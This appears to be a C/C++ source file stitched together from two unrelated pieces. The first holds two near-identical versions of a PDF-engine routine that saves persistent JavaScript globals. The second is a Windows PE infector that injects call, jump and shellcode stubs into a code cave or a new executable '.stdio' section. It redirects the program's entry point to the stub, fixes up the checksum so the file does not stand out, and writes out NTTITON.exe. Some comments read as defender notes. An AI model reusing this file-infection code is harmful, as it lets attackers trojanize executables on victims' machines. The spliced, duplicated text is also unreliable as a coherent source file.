void CJS_GlobalData::SaveGlobalPersisitentVariables() {
  // Serialize the persistent elements into one payload. The first element
  // that would push the payload past JS_MAXGLOBALDATA stops the walk, so any
  // persistent entries after it are silently left out of the file; |nCount|
  // is the number of records actually kept.
  CFX_BinaryBuf sData;
  uint32_t nCount = 0;
  for (const auto& pElement : m_arrayGlobalData) {
    if (!pElement->bPersistent)
      continue;
    CFX_BinaryBuf sElement;
    MakeByteString(pElement->data.sKey, &pElement->data, sElement);
    if (sData.GetSize() + sElement.GetSize() > JS_MAXGLOBALDATA)
      break;
    sData.AppendBlock(sElement.GetBuffer(), sElement.GetSize());
    ++nCount;
  }

  // On-disk layout, every field in host byte order:
  //   uint16 magic 'XF' | uint16 version (2) | uint32 record count |
  //   uint32 payload size | payload
  CFX_BinaryBuf sFile;
  uint16_t wType = static_cast<uint16_t>(('X' << 8) | 'F');
  uint16_t wVersion = 2;
  uint32_t dwSize = sData.GetSize();
  sFile.AppendBlock(&wType, sizeof(wType));
  sFile.AppendBlock(&wVersion, sizeof(wVersion));
  sFile.AppendBlock(&nCount, sizeof(nCount));
  sFile.AppendBlock(&dwSize, sizeof(dwSize));
  sFile.AppendBlock(sData.GetBuffer(), sData.GetSize());

  // The whole file is RC4-encrypted with the compiled-in JS_RC4KEY. Because
  // the key ships inside the binary this is obfuscation of the on-disk
  // format, not confidentiality for the stored values.
  CRYPT_ArcFourCryptBlock(sFile.GetBuffer(), sFile.GetSize(), JS_RC4KEY,
                          sizeof(JS_RC4KEY));
  // Best-effort write: the result of WriteFileBuffer is not checked.
  WriteFileBuffer(m_sFilePath.c_str(),
                  reinterpret_cast<const FX_CHAR*>(sFile.GetBuffer()),
                  sFile.GetSize());
}
void CJS_GlobalData::SaveGlobalPersisitentVariables() {
  // Collect the persistent elements into a single payload. The walk ends at
  // the first element that would overflow JS_MAXGLOBALDATA, so persistent
  // entries after it are dropped from the file; |nCount| is the number kept.
  FX_DWORD nCount = 0;
  CFX_BinaryBuf sData;
  const int sz = m_arrayGlobalData.GetSize();
  for (int i = 0; i < sz; ++i) {
    CJS_GlobalData_Element* pElement = m_arrayGlobalData.GetAt(i);
    if (!pElement->bPersistent)
      continue;
    CFX_BinaryBuf sElement;
    MakeByteString(pElement->data.sKey, &pElement->data, sElement);
    if (sData.GetSize() + sElement.GetSize() > JS_MAXGLOBALDATA)
      break;
    sData.AppendBlock(sElement.GetBuffer(), sElement.GetSize());
    ++nCount;
  }

  // On-disk layout, every field in host byte order:
  //   FX_WORD magic 'XF' | FX_WORD version (2) | FX_DWORD record count |
  //   FX_DWORD payload size | payload
  CFX_BinaryBuf sFile;
  FX_WORD wType = static_cast<FX_WORD>(('X' << 8) | 'F');
  FX_WORD wVersion = 2;
  FX_DWORD dwSize = sData.GetSize();
  sFile.AppendBlock(&wType, sizeof(wType));
  sFile.AppendBlock(&wVersion, sizeof(wVersion));
  sFile.AppendBlock(&nCount, sizeof(nCount));
  sFile.AppendBlock(&dwSize, sizeof(dwSize));
  sFile.AppendBlock(sData.GetBuffer(), sData.GetSize());

  // RC4 with the compiled-in JS_RC4KEY: the key is part of the binary, so
  // this obscures the file format rather than protecting the values.
  CRYPT_ArcFourCryptBlock(sFile.GetBuffer(), sFile.GetSize(), JS_RC4KEY,
                          sizeof(JS_RC4KEY));
  // Best-effort write: the result of WriteFileBuffer is not checked.
  WriteFileBuffer(m_sFilePath.c_str(),
                  reinterpret_cast<const FX_CHAR*>(sFile.GetBuffer()),
                  sFile.GetSize());
}
// Entry point of the patcher. Reads the file named by argv[1] into memory
// (CreateFileBuffer, declared outside this listing; argc is not checked),
// asks ScanCodeCave for a cave of at least sizeof(ucShellCode)+10 bytes, and
// either writes the stub into that cave or, when none is found, hands the
// image to AddSection() to append a new section. The patched image is
// written to "NTTITON.exe" in the current directory; the input buffer is
// released with VirtualFree. Note that on the cave path no PE header field is
// modified in this function, so how execution reaches the stub is not visible
// in this listing.
// Defender note: the fixed output name "NTTITON.exe" and the stub sequence
// ucCallCode / ucJMP / ucShellCode written back-to-back are the artifacts this
// routine leaves behind.
int main(int argc, char* argv[]) {
  void* lpBuffer = 0;
  unsigned long ulBuffer = CreateFileBuffer(argv[1], &lpBuffer);
  if (lpBuffer) {
    if (ulBuffer) {
      unsigned long ulCodeCave = 0;
      CodeCave sCodeCave = {0};
      // Assignment, not comparison: a non-zero return from ScanCodeCave means
      // a usable cave was found and described in sCodeCave.
      if (ulCodeCave = ScanCodeCave(&sCodeCave, lpBuffer,ulBuffer,sizeof(ucShellCode)+10)) {
        unsigned long ulOffset = 0;
        // Stub layout inside the cave: ucCallCode, then ucJMP, then
        // ucShellCode (all three declared outside this listing).
        m_memcpy((void*)(sCodeCave.ulAddress), ucCallCode, sizeof(ucCallCode));
        // Displacement from the end of the jump back to the original entry
        // point; the trailing 5 presumably is the jump's encoded length --
        // confirm against ucJMP's definition.
        ulOffset = sCodeCave.ulEntryPoint - (sCodeCave.ulVirtualAddress + sCodeCave.ulVirtualAddressOffset + sizeof(ucCallCode)) - 5;
        // Patches the 4-byte displacement at ucJMP[1] in place (ucJMP is a
        // global, so it is mutated for the rest of the run).
        m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long));
        m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP));
        m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode));
        // Only a full-length write counts as success.
        if (WriteFileBuffer("NTTITON.exe", lpBuffer,ulBuffer) == ulBuffer) {
          printf("Done\n");
        }
      } else {
        // No cave large enough: fall back to appending a section.
        AddSection(lpBuffer,ulBuffer, sizeof(ucShellCode) + 10);
      }
    }
    VirtualFree(lpBuffer,ulBuffer,MEM_RELEASE);
  }
  return 0;
}
// Appends a new executable section to the PE image held in |lpModule|
// (|ulModule| bytes of raw file data) and writes the result to "NTTITON.exe".
// |ulRawSize| is the number of payload bytes the new section must hold.
// Steps visible below: allocate a larger buffer, copy the original image into
// it, fill in a section header named ".stdio" right after the current last
// section (code | execute | read), bump NumberOfSections and SizeOfImage,
// copy ucCallCode + ucJMP + ucShellCode into the section's raw data, carry
// over any overlay bytes that followed the old last section (GetEOFSize),
// redirect AddressOfEntryPoint to the new section, and refresh the PE header
// checksum with CheckSumMappedFile. Nothing is written if the NT signature
// does not match or the allocation fails.
// Defender note: a trailing executable section named ".stdio" with the entry
// point inside it, and a header checksum that still validates, are the traits
// of a file produced by this routine.
// CalculateBoundary, GetEOFSize, WriteFileBuffer, m_memcpy, ucCallCode, ucJMP
// and ucShellCode are declared outside this listing.
void AddSection(void* lpModule, unsigned long ulModule, unsigned long ulRawSize) {
  // lpDos keeps pointing into the ORIGINAL buffer for the whole function;
  // only lpNt is rebased onto the new buffer further down.
  PIMAGE_DOS_HEADER lpDos = (PIMAGE_DOS_HEADER)(lpModule);
  PIMAGE_NT_HEADERS lpNt = (PIMAGE_NT_HEADERS)((unsigned long)lpDos + lpDos->e_lfanew);
  if (lpNt->Signature == IMAGE_NT_SIGNATURE) {
    // New file size: old size plus the payload rounded up to FileAlignment.
    unsigned long ulNewImageSize = ulModule + CalculateBoundary(lpNt->OptionalHeader.FileAlignment, ulRawSize);
    if (ulNewImageSize) {
      // 0x40 == PAGE_EXECUTE_READWRITE; the buffer is only used as a file image here.
      void * lpNewBase = VirtualAlloc(NULL,ulNewImageSize,MEM_COMMIT|MEM_RESERVE,0x40);
      if (lpNewBase) {
        // Section table entry of the current last section, addressed inside
        // the new buffer (40 == sizeof(IMAGE_SECTION_HEADER)); the new header
        // goes in the slot immediately after it. Both are read only after the
        // copy below, and the slot is assumed to be free -- nothing here
        // checks SizeOfHeaders for room.
        PIMAGE_SECTION_HEADER lpLastSection = (PIMAGE_SECTION_HEADER)((unsigned long)lpNewBase + lpDos->e_lfanew + sizeof(IMAGE_NT_HEADERS) + ((lpNt->FileHeader.NumberOfSections-1)*40));
        PIMAGE_SECTION_HEADER lpNewSection = (PIMAGE_SECTION_HEADER)((unsigned long)lpLastSection + sizeof(IMAGE_SECTION_HEADER));
        unsigned long ulEOF = 0;
        unsigned long ulCheckSum = 0;
        unsigned long ulOldCheckSum = 0;
        unsigned long ulEntryPoint = 0;
        unsigned long ulOffset = 0;
        // From here on every header write goes to the copy, not the input.
        lpNt = (PIMAGE_NT_HEADERS)((unsigned long)lpNewBase+ lpDos->e_lfanew);
        RtlSecureZeroMemory(lpNewBase,ulNewImageSize);
        m_memcpy(lpNewBase,lpModule,ulModule);
        // Section name ".stdio" (6 bytes; the remaining name bytes stay zero
        // from RtlSecureZeroMemory).
        m_memcpy(&lpNewSection->Name, ".stdio", strlen(".stdio"));
        lpNewSection->SizeOfRawData = CalculateBoundary(lpNt->OptionalHeader.FileAlignment,ulRawSize);
        // Raw data follows the old last section's raw data, file-aligned;
        // virtual placement follows its VirtualSize, section-aligned.
        lpNewSection->PointerToRawData = CalculateBoundary(lpNt->OptionalHeader.FileAlignment, lpLastSection->PointerToRawData + lpLastSection->SizeOfRawData);
        lpNewSection->VirtualAddress = CalculateBoundary(lpNt->OptionalHeader.SectionAlignment, lpLastSection->VirtualAddress + lpLastSection->Misc.VirtualSize);
        lpNewSection->Characteristics = (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ);
        lpNewSection->Misc.VirtualSize = ulRawSize;
        lpNt->FileHeader.NumberOfSections++;
        lpNt->OptionalHeader.SizeOfImage = CalculateBoundary(lpNt->OptionalHeader.SectionAlignment, lpNewSection->VirtualAddress + ulRawSize);
        // Original entry point, saved before it is overwritten below.
        ulEntryPoint = lpNt->OptionalHeader.AddressOfEntryPoint;
        // Stub layout in the new section: ucCallCode, then ucJMP, then ucShellCode.
        m_memcpy((void*)((unsigned long)lpNewBase + 
lpNewSection->PointerToRawData), ucCallCode, sizeof(ucCallCode));
        // Displacement from the end of the jump back to the original entry
        // point; the trailing 5 presumably is the jump's encoded length --
        // confirm against ucJMP's definition.
        ulOffset = ulEntryPoint - (lpNewSection->VirtualAddress + sizeof(ucCallCode)) - 5;
        // Patches the 4-byte displacement at ucJMP[1] in place (global state).
        m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long));
        m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP));
        m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode));
        // Assignment, not comparison: a non-zero overlay size means bytes
        // past the old last section exist and are moved after the new one.
        if (ulEOF = GetEOFSize(lpLastSection, ulModule)) {
          m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + lpNewSection->SizeOfRawData), (void*)((unsigned long)lpModule + (lpLastSection->PointerToRawData + lpLastSection->SizeOfRawData)), ulEOF);
        }
        // Execution now starts in the new section.
        lpNt->OptionalHeader.AddressOfEntryPoint = (lpNewSection->VirtualAddress);
        // Keep the header checksum consistent with the modified image so the
        // file does not stand out on a checksum mismatch.
        if (CheckSumMappedFile(lpNewBase,ulNewImageSize, &ulOldCheckSum, &ulCheckSum)) {
          lpNt->OptionalHeader.CheckSum = ulCheckSum;
        }
        if (WriteFileBuffer("NTTITON.exe",lpNewBase,ulNewImageSize)) {
          printf("Had to add section.... no codecaves were available FUUUUCK\n");
        }
        VirtualFree(lpNewBase,ulNewImageSize,MEM_RELEASE);
      }
    }
  }
}